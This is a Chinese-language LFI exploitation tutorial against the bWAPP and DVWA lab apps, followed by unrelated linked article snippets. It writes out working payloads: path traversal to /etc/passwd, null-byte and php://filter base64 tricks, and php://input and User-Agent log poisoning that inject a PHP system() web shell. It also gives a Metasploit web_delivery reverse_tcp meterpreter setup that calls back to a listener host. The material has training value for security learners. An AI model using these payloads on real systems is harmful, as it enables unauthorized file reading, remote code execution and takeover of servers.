0x00 前言

本文的主要目的是分享在服务器遭受文件包含漏洞时，使用各种技术对Web服务器进行攻击的想法。 我们都知道LFI漏洞允许用户通过在URL中包括一个文件。在本文中，我使用了bWAPP和DVWA两个不同的平台，其中包含文件包含漏洞的演示。通过它我以四种不同的方式执行LFI攻击。

0x01 基本本地文件包含

在浏览器中输入目标IP，并在BWAPP内登录（bee：bug），现在选择bug：remote & local file Inclusion，然后点击hack。

打开具有RFI和LFI漏洞的网页。在下拉列表中选择语言释，单击go按钮时，所选的语言文件将包含在URL中。 执行基本攻击操作。

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd

在基本的LFI攻击中，我们可以使用（../）或简单地（/）从目录中直接读取文件的内容，下面的截图中在浏览器URL中访问密码文件。

0x02 Null byte

在一些情况下，由于高安全级别，上面提到的基本本地文件包含攻击可能不工作。从下面的截图可以观察到，当在URL中执行相同的路径时，却无法读取密码文件。  所以当面对这样的问题，可以进行NULL byte攻击。

打开burp suite捕获浏览器请求，然后选择代理选项卡并开始截取。 不要忘记在使用burp suite时设置浏览器代理。

将拦截的数据发送到repeater。

在repeater中做发送的请求和响应生成的分析。从截图可以清楚的看出/ etc / passwd不能读取。

在下面的截图中，通过在etc/passwd目录的末尾添加空字符（％00）来转发请求，然后单击go选项卡。然后在窗口的右视图上，密码文件作为响应打开。

0x03 Base64 encoded

当安全级别高并且无法查看PHP文件内容时，使用以下PHP函数：

http://192.168.1.101/bWAPP/rlfi.php?language=php：//filter/read=convert.base64-encode/resource=/etc/passwd

从以下截图可以看到passwd文件内容编码为base64,复制整个编码文本。

使用hackbar解码复制的编码文本。

将复制的编码文本粘贴到弹出的对话框内。

密码文件的内容：

0x04 PHP Input

使用PHP Input函数，通过执行注入PHP代码来利用LFI漏洞。首先，加载目标网页URL：

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go

使用PHP input函数：

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

然后选中enable Post data复选框，转发提交的数据，并在给定文本区域中添加cmd命令<？php system（$ _ GET [‘cmd’]）; ？>。如下图所示，最后点击execute。

通过反向连接连接目标机器; 在kali Linux中打开终端输入msfconsole启动metasploit。

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.0.104 

msf exploit (web_delivery)>set srvport  8081

msf exploit (web_delivery)>exploit

复制下图中的高亮文本：

将上面复制的PHP代码粘贴到URL中，如下图所示，并执行它。

当上面的URL被执行时，将metasploit中获得目标的meterpreter会话。

msf exploit (web_delivery)>session –I 1

meterpreter> sysinfo

0x05 Proc/self/environ

如果服务超时，通过LFI利用它。可以包括存储User_Agent的proc/self/environ文件，在文件中插入用于执行CMD命令的PHP代码。

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ

启动burp suite拦截浏览器请求，并将获取数据发送到repeater。

将CMD命令<?php system($_GET[‘cmd’]); ?>添加到user_Agent内，并使用GET参数192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id发送请求。响应如下图右侧所示。

本地文件包含漏洞（LFI漏洞）的更多相关文章

1. phpMyAdmin 4&period;8&period;x 本地文件包含漏洞利用

   phpMyAdmin 4.8.x 本地文件包含漏洞利用 今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell.该漏洞利用 ...

2. Elasticsearch 核心插件Kibana 本地文件包含漏洞分析（CVE-2018-17246）

   不久前Elasticsearch发布了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻 ...

3. Nagios Looking Glass 本地文件包含漏洞

   漏洞名称: Nagios Looking Glass 本地文件包含漏洞 CNNVD编号: CNNVD-201310-682 发布时间: 2013-10-31 更新时间: 2013-10-31 危害等级 ...

4. WP e-Commerce WordPress Payment Gateways Caller插件本地文件包含漏洞

   漏洞名称: WP e-Commerce WordPress Payment Gateways Caller插件本地文件包含漏洞 CNNVD编号: CNNVD-201310-642 发布时间: 2013 ...

5. 易酷 cms2&period;5 本地文件包含漏洞 getshell

   易酷 cms2.5  本地文件包含漏洞 getshell 首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php) 安装成功直接进行复现吧 本地包含一 ...

6. 关于Discuz&excl; X系列UC&lowbar;Server 本地文件包含漏洞

   最近又发现discuz论坛被挂马了,决定好好研究一下discuz的漏洞,技术债始终要还是要还的 一.问题发现 快要睡觉的时候,突然收到一封邮件,发现服务器上的文件被篡改了,立即登录服务器,清空恶意文件 ...

7. phpMyAdmin本地文件包含漏洞

   4 phpMyAdmin本地文件包含漏洞 4.1 摘要 4.1.1 漏洞简介 phpMyAdmin是一个web端通用MySQL管理工具,上述版本在/libraries/gis/pma_gis_fact ...

8. 易酷CMS2&period;5本地文件包含漏洞复现

   易酷CMS是一款影片播放CMS.该CMS2.5版本存在本地文件包含漏洞.我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中.然后利用文件包含漏洞包含该日志文件,再用菜刀连 ...

9. 文件包含上传漏洞&amp&semi;目录遍历命令执行漏洞

   文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create_function() array_map() arr ...

随机推荐

1. 并联机构逆运动学用MapleSim符号来解决

   在多体机械中,平台的运动学分析(运动学问题)可以分为两类:正向运动学问题和逆向运动学问题.所谓正向运动学是指研究机构中一点(例如,机械手臂上终端操作机构或由并联机械操纵器支持的平台的中心)在空间中的位 ...

2. 什么是 WSGI -- Python 中的 &OpenCurlyDoubleQuote;CGI” 接口简介

   今天在 git.oschina 的首页上看到他们推出演示平台,其中,Python 的演示平台支持 WSGI 接口的应用.虽然,这个演示平台连它自己提供的示例都跑不起来,但是,它还是成功的勾起了我对 W ...

3. 手机中点击链接或button按钮出现黄色边框的解决办法

   a,input,button{outline: none; -webkit-tap-highlight-color: rgba(255, 255, 255, 0); -webkit-focus-rin ...

4. NGUI实现一个背包功能

   界面布局是这样的,一个400*400的背景,然后在其上是16张小图片,每个小图片格子可以用来放置拾取的物品.有两个预制体,一个是可放置的小格子,一个是拾取的物品(包含一个此物品有多少的Label). ...

5. 观察者模式（Observer）和发布（Publish&sol;订阅模式（Subscribe）的区别

   观察者模式(Observer)和发布(Publish/订阅模式(Subscribe)的区别 在翻阅资料的时候,有人把观察者(Observer)模式等同于发布(Publish)/订阅(Subscribe ...

6. 51Nod1123 X&Hat;A Mod B 数论 中国剩余定理 原根 BSGS

   原文链接https://www.cnblogs.com/zhouzhendong/p/51Nod1123.html 题目传送门 - 51Nod1123 题意 $T$ 组数据. 给定 $A,B,C$,求 ...

7. Codeforce 835B - The number on the board （贪心）

   Some natural number was written on the board. Its sum of digits was not less than k. But you were di ...

8. 2017&period;12&period;21-JQuery

   作业:密码加强验证 <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> & ...

9. asp&period;net序列化

   JsonHelp.cs using System.IO; using System.Text; using System.Runtime.Serialization.Json; namespace W ...

10. UI设计行业中的&OpenCurlyDoubleQuote;延禧攻略”，教你从青铜变王者

    最近一直在追<延禧攻略>,女主魏璎珞敢爱敢恨,有仇必报的性格吸引不少人,她从低贱的秀坊小宫女步步为营,最终成为皇帝最宠爱的令妃呼风唤雨.尔虞我诈的后宫,想要打怪升级光有颜值是万万不够的,更 ...